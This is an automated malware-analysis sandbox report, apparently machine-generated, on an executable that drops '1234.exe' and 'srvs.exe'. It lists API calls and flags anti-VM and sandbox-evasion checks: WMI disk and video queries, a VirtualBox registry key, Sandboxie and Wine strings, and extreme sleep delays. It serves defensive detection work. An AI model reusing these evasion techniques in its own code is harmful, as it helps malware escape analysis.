                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014005E330 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,CreateDCW,GetDC,GetPixel,DeleteDC,ReleaseDC,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140075850 SetDlgItemTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140075850 SetDlgItemTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140044A00 IsDlgButtonChecked,IsWindowVisible,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,IsDlgButtonChecked,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140071A10 GetWindowLongW,GetWindowLongW,SetWindowPos,EnableWindow,GetWindowRect,GetClientRect,MulDiv,MulDiv,GetWindowRect,GetWindowRect,GetClientRect,MulDiv,MulDiv,GetWindowRect,IsWindow,SetParent,SetWindowLongPtrW,SetParent,IsWindowVisible,IsIconic,SetWindowLongW,SetWindowLongW,SetWindowPos,InvalidateRect,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400C2BE0 IsIconic,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140040D29 IsZoomed,IsIconic,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140079D90 IsDlgButtonChecked,GetWindowLongW,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,IsDlgButtonChecked,GetWindowLongW,ShowWindow,EnableWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,SetFocus,IsDlgButtonChecked,SetFocus,MapWindowPoints,InvalidateRect,
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1234.exe PID: 4628, type: MEMORY
                      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Roaming\1234.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Roaming\1234.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Query firmware table information (likely to detect VMs)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeSystem information queried: FirmwareTableInformation
                      Tries to detect sandboxes / dynamic malware analysis system (registry check)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: 1234.exe, 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: 1234.exe, 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                      Source: C:\Users\user\AppData\Roaming\1234.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\1234.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\1234.exeWindow / User API: threadDelayed 678
                      Source: C:\Users\user\AppData\Roaming\1234.exeWindow / User API: threadDelayed 8242
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeWindow / User API: threadDelayed 562
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeWindow / User API: threadDelayed 5387
                      Source: C:\Users\user\AppData\Roaming\1234.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Users\user\AppData\Roaming\1234.exe TID: 6008Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\1234.exe TID: 1320Thread sleep time: -9223372036854770s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exe TID: 5404Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\1234.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140013FF0 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jl 0000000140014030h country: Spanish (es)
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140014380 GetKeyboardLayout followed by cmp: cmp dl, 00000019h and CTI: ja 00000001400144F3h country: Russian (ru)
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400055F0 GetKeyboardLayout followed by cmp: cmp ebx, 0ah and CTI: jl 0000000140005720h country: Spanish (es)
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014000DAA0 GetKeyboardLayout followed by cmp: cmp word ptr [r14+02h], bp and CTI: jne 000000014000DBAAh
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140045CF0 GetLocalTime followed by cmp: cmp word ptr [rbx], ax and CTI: je 0000000140046041h
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140045CF0 GetLocalTime followed by cmp: cmp dx, ax and CTI: je 0000000140045F13h
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140087A90 GetFileAttributesW,FindFirstFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140087B90 FindFirstFileW,FindClose,FindFirstFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D080 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140062320 GetFileAttributesW,FindFirstFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400C2390 FindFirstFileW,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D405 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D40F SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D419 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D423 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D44D SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D478 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D4A0 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D4BE SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D4DF SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D500 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D792 FindFirstFileW,GetLastError,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D7E0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D990 SystemTimeToFileTime,LocalFileTimeToFileTime,GetLastError,GetSystemTimeAsFileTime,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,CreateFileW,GetLastError,SetFileTime,GetLastError,CloseHandle,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140061A30 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,CopyFileW,GetLastError,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004CAE0 SetLastError,DeleteFileW,GetLastError,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,DeleteFileW,GetLastError,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140032DC0 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004DFA0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,
                      Source: C:\Users\user\AppData\Roaming\1234.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\1234.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeThread delayed: delay time: 922337203685477
